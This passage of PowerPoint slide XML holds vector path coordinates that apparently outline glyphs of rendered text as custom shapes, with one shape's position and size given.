                <a:lnTo>
                  <a:pt x="450420" y="100261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456081" y="96370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457748" y="94954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424259" y="94954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418951" y="92976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410595" y="85063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408494" y="80051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408494" y="69214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409714" y="64944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414512" y="57549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414615" y="57391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417867" y="54401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421910" y="52197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452783" y="52197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446798" y="49634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446798" y="49230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452287" y="46757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453212" y="45994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438442" y="45994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="435483" y="45138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411114" y="20300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412944" y="16657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420065" y="11342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419898" y="11342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424823" y="9915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457926" y="9915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448723" y="2517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448958" y="2517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440588" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="452783" y="52197"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="421910" y="52197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426088" y="53726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429453" y="54918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434490" y="56628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436793" y="57549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452332" y="81893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450367" y="86524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="442507" y="93269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437245" y="94954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457748" y="94954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462856" y="90616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466244" y="83399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466244" y="68609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464573" y="63573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457910" y="55659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453100" y="52333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452783" y="52197"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="457926" y="9915"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="436229" y="9915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440972" y="11342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448402" y="17050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450254" y="20884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450202" y="30100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449396" y="33561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="445985" y="39947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="442891" y="43027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438442" y="45994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453212" y="45994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456442" y="43330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462111" y="34562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463534" y="30100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463534" y="18141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="460553" y="12026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457926" y="9915"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="521081" y="270"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="488448" y="29327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486351" y="52468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486871" y="65090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="488299" y="74925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="488417" y="75734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521081" y="104801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529393" y="104011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536543" y="101640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542528" y="97688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546025" y="93674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516564" y="93674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513140" y="92795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512093" y="92156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507530" y="89065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="505429" y="86389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504025" y="83085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502439" y="79443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502312" y="79152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501332" y="75162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501274" y="74925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500280" y="65484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500031" y="59617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500058" y="45633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516835" y="11398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545923" y="11398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542706" y="7572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536712" y="3516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529503" y="1082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521081" y="270"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="545923" y="11398"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="525349" y="11398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528850" y="12274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534270" y="15781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536459" y="18434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537997" y="21851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539623" y="25358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540631" y="29327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540709" y="29650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541836" y="39699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542107" y="45633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542097" y="59617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541846" y="65090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541817" y="65484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540734" y="74925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540707" y="75162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539718" y="79152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539645" y="79443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536657" y="86389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536551" y="86637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534383" y="89288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528805" y="92795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525304" y="93674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546025" y="93674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547347" y="92156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551052" y="84934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553699" y="75912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555229" y="65484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555287" y="65090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555811" y="52604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555303" y="40351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555225" y="39699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553748" y="29650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553669" y="29327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551128" y="20572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547482" y="13252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545923" y="11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B15A9834-4ABA-A8DA-6DE0-C8753C825A23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060674" y="4257057"/>
            <a:ext cx="737235" cy="104775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="33276" y="2100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13356" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13356" y="65077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33906" y="65077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39864" y="64219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49307" y="60764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53399" y="58168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57866" y="53697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13356" y="53697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13356" y="13571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59950" y="13571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57514" y="10929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50454" y="6209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46744" y="4629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38380" y="2596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33276" y="2100"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="59950" y="13571"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30803" y="13571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34299" y="13864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39830" y="15083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51803" y="35745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51365" y="38432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30015" y="53697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57866" y="53697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59649" y="51913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61819" y="48616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64922" y="41029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65697" y="36896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65634" y="26306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64654" y="21767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60471" y="14135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59950" y="13571"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="110817" y="25087"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78368" y="48401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76014" y="64874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76602" y="73600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103237" y="103948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110817" y="104616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118343" y="103948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125066" y="101946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130988" y="98615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136113" y="93958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136305" y="93687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103997" y="93687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98716" y="91271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89113" y="55119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91010" y="47871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98599" y="38387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103951" y="36016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136273" y="36016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136112" y="35790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130988" y="31107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125066" y="27763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118343" y="25756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110817" y="25087"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="136273" y="36016"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="117615" y="36016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122923" y="38387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130557" y="47871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132476" y="55119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132476" y="74426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130624" y="81355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130557" y="81606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122855" y="91271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117570" y="93687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136305" y="93687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145553" y="64874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144964" y="56157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143196" y="48401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140246" y="41611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136273" y="36016"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="180357" y="27458"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167686" y="27458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167686" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180357" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180357" y="49045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183744" y="46290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187245" y="44055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194540" y="40600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197828" y="39832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214708" y="39832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214708" y="38319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180357" y="38319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180357" y="27458"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="214708" y="39832"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="206758" y="39832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210304" y="40238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212323" y="40600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214031" y="41006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214708" y="41006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214708" y="39832"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="211230" y="27458"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200184" y="27458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197544" y="28022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189842" y="31409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185393" y="34277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180357" y="38319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214708" y="38319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214708" y="28022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214853" y="28022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211230" y="27458"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="241336" y="37845"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228666" y="37845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228666" y="87026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230653" y="93664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238671" y="101929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244520" y="104006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254413" y="104006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256920" y="103803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262543" y="102990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265141" y="102471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267173" y="101929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267512" y="101929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267512" y="92874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251951" y="92874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250004" y="92558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249545" y="92558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245948" y="90842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241426" y="79213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241336" y="37845"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="267512" y="90435"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="266834" y="90435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265841" y="90842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264237" y="91361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259743" y="92558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257575" y="92874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267512" y="92874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267512" y="90435"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="267512" y="27187"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="220106" y="27187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220106" y="37845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267512" y="37845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267512" y="27187"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="241336" y="5532"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228666" y="5532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228666" y="27187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241336" y="27187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241336" y="5532"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="311417" y="27187"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="295314" y="27187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295314" y="46403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311417" y="46403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311417" y="27187"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="311417" y="83300"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="295314" y="83300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295314" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311417" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311417" y="83300"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="459756" y="92264"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="405393" y="92264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405393" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="459756" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="459756" y="92264"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="439248" y="1761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="428791" y="1761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428611" y="4674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427933" y="7000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408217" y="15783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405393" y="15783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405393" y="24951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426285" y="24951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426285" y="92264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="439248" y="92264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="439248" y="1761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="521074" y="67"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="488441" y="29140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486344" y="52274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486864" y="64891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="488295" y="74742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="488410" y="75538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521074" y="104616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529386" y="103825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536536" y="101452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542521" y="97500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546022" y="93484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516579" y="93484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513142" y="92603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512098" y="91971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507523" y="88877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="505422" y="86190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504018" y="82893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502306" y="78964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501322" y="74968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501267" y="74742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500273" y="65280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500025" y="59432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500052" y="45432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516828" y="11200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545918" y="11200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542699" y="7374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536705" y="3316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529496" y="880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521074" y="67"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="545918" y="11200"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="525342" y="11200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528843" y="12080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534263" y="15580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536452" y="18245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537990" y="21654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539616" y="25154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540623" y="29140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540703" y="29467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541829" y="39516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542100" y="45432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542090" y="59432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536651" y="86190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536544" y="86439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534376" y="89103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528798" y="92603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525297" y="93484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546022" y="93484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547340" y="91971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551045" y="84739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553692" y="75713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555223" y="65280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555280" y="64891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555804" y="52409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555296" y="40148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555220" y="39516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553743" y="29467"/>
                </a:lnTo>
